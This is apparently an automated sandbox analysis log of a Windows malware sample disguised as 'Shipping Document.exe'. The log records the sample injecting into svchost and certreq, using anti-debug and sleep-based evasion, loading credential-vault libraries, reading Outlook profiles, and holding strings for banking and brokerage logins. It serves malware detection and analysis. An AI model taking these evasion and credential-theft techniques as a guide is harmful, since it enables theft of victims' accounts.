Source: C:\Windows\SysWOW64\certreq.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Shipping Document.exe Static file information: File size 1153024 > 1048576
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Shipping Document.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: certreq.pdb source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3978300136.000000000010E000.00000002.00000001.01000000.00000004.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3978327377.000000000010E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: certreq.pdbGCTL source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source: Shipping Document.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Shipping Document.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Shipping Document.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Shipping Document.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Shipping Document.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0103C304 LoadLibraryA,GetProcAddress, 1_2_0103C304
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE8B85 push ecx; ret 1_2_00FE8B98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407003 push 88CA774Fh; iretd 2_2_00407013
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A09F push 5D5B5E5Fh; ret 2_2_0041A0A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040196F push ecx; ret 2_2_00401979
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A13F push esp; ret 2_2_0040A141
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040C9C3 pushfd ; iretd 2_2_0040C9C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041198D push ebp; iretd 2_2_0041198F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041324A push edx; iretd 2_2_0041324B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407207 push eax; ret 2_2_0040721D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004032C0 push eax; ret 2_2_004032C2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401A92 push ds; ret 2_2_00401A99
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413398 push esi; iretd 2_2_004133F4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408435 push ebx; retf 2_2_0040843D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040ACBC push cs; retf 2_2_0040ACBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404D02 push ds; iretd 2_2_00404D03
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404DFC push eax; iretd 2_2_00404DFD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401F7D push ebx; iretd 2_2_00401F7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300225F pushad ; ret 2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030027FA pushad ; ret 2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300283D push eax; iretd 2_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300135E push eax; iretd 2_2_03001369
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055409AD push ecx; mov dword ptr [esp], ecx 4_2_055409B6
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F3FCCB push edi; retn B137h 4_2_02F3FE78
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F300DA push esi; iretd 4_2_02F30131
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F25172 push ebx; retf 4_2_02F2517A
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F2E6CA push ebp; iretd 4_2_02F2E6CC
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F21A3F push ds; iretd 4_2_02F21A40
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F21B39 push eax; iretd 4_2_02F21B3A
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F279F9 push cs; retf 4_2_02F279FB
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F26E7C push esp; ret 4_2_02F26E7E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00FC4A35
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_010455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_010455FD
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00FE33C7
Source: C:\Users\user\Desktop\Shipping Document.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
Source: C:\Windows\SysWOW64\certreq.exe Window / User API: threadDelayed 1059 Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Window / User API: threadDelayed 8913 Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\Shipping Document.exe API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\certreq.exe API coverage: 2.8 %
Source: C:\Windows\SysWOW64\certreq.exe TID: 5696 Thread sleep count: 1059 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe TID: 5696 Thread sleep time: -2118000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe TID: 5696 Thread sleep count: 8913 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe TID: 5696 Thread sleep time: -17826000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580 Thread sleep time: -85000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\certreq.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01024696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_01024696
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102C93C FindFirstFileW,FindClose, 1_2_0102C93C
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0102C9C7
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0102F35D
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0102F200
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0102F65E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01023A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_01023A2B
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01023D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_01023D4E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0102BF27
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F3B8A0 FindFirstFileW,FindNextFileW,FindClose, 4_2_02F3B8A0
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00FC4AFE
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 33sf7m69.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 33sf7m69.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 33sf7m69.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 33sf7m69.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 33sf7m69.4.dr Binary or memory string: discord.comVMware20,11696492231f
Source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3982811551.0000000001320000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1971556229.0000017A9688D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 33sf7m69.4.dr Binary or memory string: global block list test formVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 33sf7m69.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 33sf7m69.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 33sf7m69.4.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 33sf7m69.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 33sf7m69.4.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 33sf7m69.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 33sf7m69.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 33sf7m69.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 33sf7m69.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 33sf7m69.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 33sf7m69.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\Shipping Document.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Shipping Document.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417153 LdrLoadDll, 2_2_00417153
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_010341FD BlockInput, 1_2_010341FD
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00FC3B4C
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00FF5CCC
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0103C304 LoadLibraryA,GetProcAddress, 1_2_0103C304
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01E53570 mov eax, dword ptr fs:[00000030h] 1_2_01E53570
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01E53510 mov eax, dword ptr fs:[00000030h] 1_2_01E53510
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01E51ED0 mov eax, dword ptr fs:[00000030h] 1_2_01E51ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
